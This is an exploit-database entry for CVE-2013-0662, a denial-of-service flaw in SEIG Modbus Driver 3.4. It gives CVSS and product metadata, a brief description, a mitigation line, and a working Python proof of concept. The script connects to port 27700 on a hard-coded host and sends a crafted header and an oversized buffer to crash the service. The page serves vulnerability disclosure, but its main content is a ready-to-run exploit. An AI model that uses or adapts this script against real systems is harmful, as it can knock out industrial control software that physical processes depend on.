SEIG Modbus 3.4 - Denial of Service (PoC)

vendor:

SEIG Modbus Driver

by:

Alejandro Parodi

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: SEIG Modbus Driver

Affected Version From: v3.4

Affected Version To: v3.4

Patch Exists: YES

Related CWE: CVE-2013-0662

CPE: a:schneider_electric:seig_modbus_driver:3.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows7 x86

2018

SEIG Modbus 3.4 – Denial of Service (PoC)

A denial of service vulnerability exists in SEIG Modbus 3.4 due to improper validation of user-supplied input. An attacker can send a specially crafted packet to the vulnerable server, resulting in a denial of service condition.

Mitigation:

Apply the latest security patches from the vendor to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References: 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct
import time

ip = "192.168.127.137"
port = 27700
con = (ip, port)

header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"

header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)